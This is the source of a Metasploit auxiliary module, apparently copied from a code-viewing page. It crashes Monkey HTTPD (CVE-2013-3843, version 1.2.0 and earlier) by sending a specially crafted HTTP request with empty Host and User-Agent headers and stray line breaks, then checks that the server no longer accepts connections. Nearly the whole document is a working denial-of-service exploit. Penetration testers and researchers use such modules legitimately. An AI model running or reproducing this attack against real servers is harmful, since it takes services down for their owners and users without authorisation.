Path: blob/master/modules/auxiliary/dos/http/monkey_headers.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Tcp7include Msf::Auxiliary::Dos89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Monkey HTTPD Header Parsing Denial of Service (DoS)',14'Description' => %q{15This module causes improper header parsing that leads to a segmentation fault16due to a specially crafted HTTP request. Affects version <= 1.2.0.17},18'Author' => [19'Doug Prostko <dougtko[at]gmail.com>'20],21'License' => MSF_LICENSE,22'References' => [23['CVE', '2013-3843'],24['OSVDB', '93853'],25['BID', '60333']26],27'DisclosureDate' => '2013-05-30',28'Notes' => {29'Stability' => [CRASH_SERVICE_DOWN],30'SideEffects' => [],31'Reliability' => []32}33)34)3536register_options(37[38Opt::RPORT(2001)39]40)41end4243def dos44req = "GET / HTTP/1.1\r\n"45req << "Host:\r\n\r\nlocalhost\r\n"46req << "User-Agent:\r\n\r\n"4748connect49sock.put(req)50disconnect51end5253def is_alive?54begin55connect56rescue Rex::ConnectionRefused57return false58ensure59disconnect60end6162true63end6465def run66print_status("#{rhost}:#{rport} - Sending DoS packet...")67dos6869print_status("#{rhost}:#{rport} - Checking server status...")70select(nil, nil, nil, 1)7172if is_alive?73print_error("#{rhost}:#{rport} - Server is still alive")74else75print_good("#{rhost}:#{rport} - Connection Refused: Success!")76end77end78end798081